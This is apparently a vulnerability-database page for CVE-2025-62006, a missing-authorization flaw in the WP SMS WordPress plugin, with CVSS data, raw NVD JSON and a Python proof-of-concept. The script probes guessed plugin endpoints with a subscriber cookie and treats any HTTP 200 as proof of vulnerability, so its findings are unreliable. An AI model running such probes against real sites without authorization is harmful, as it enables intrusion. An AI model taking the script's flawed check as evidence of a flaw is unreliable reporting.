Security Vulnerability Report
中文
CVE-2025-62006 CVSS 5.4 MEDIUM

CVE-2025-62006

Published: 2025-10-22 15:16:02
Last Modified: 2026-04-27 17:16:29

Description

Missing Authorization vulnerability in VeronaLabs WP SMS wp-sms.This issue affects WP SMS: from n/a through <= 7.0.1.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WP SMS (VeronaLabs) <= 7.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62006 PoC - WP SMS Broken Access Control # Target: WordPress site with WP SMS plugin <= 7.0.1 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-62006 Missing Authorization in WP SMS plugin """ # Common WP SMS endpoints that might be vulnerable vulnerable_endpoints = [ "/wp-admin/admin-ajax.php?action=wp_sms_send_sms", "/wp-admin/admin-ajax.php?action=wp_sms_subscribers", "/wp-admin/admin-ajax.php?action=wp_sms_add_subscriber", "/wp-json/wp-sms/v1/send" ] print("[*] Testing for CVE-2025-62006 - WP SMS Broken Access Control") print(f"[*] Target: {TARGET_URL}") # Test with low-privilege user session (e.g., subscriber) # In real attack scenario, attacker would have a subscriber account cookies = { 'wordpress_test_cookie': 'WP+Cookie+check', # Add authenticated subscriber session cookie here } for endpoint in vulnerable_endpoints: url = TARGET_URL + endpoint try: response = requests.get(url, cookies=cookies, timeout=10) # Check if request succeeds without proper authorization if response.status_code == 200: print(f"[!] Potential vulnerability found at {endpoint}") print(f" Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62006", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:02.407", "lastModified": "2026-04-27T17:16:29.330", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in VeronaLabs WP SMS wp-sms.This issue affects WP SMS: from n/a through <= 7.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-sms/vulnerability/wordpress-wp-sms-plugin-7-0-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}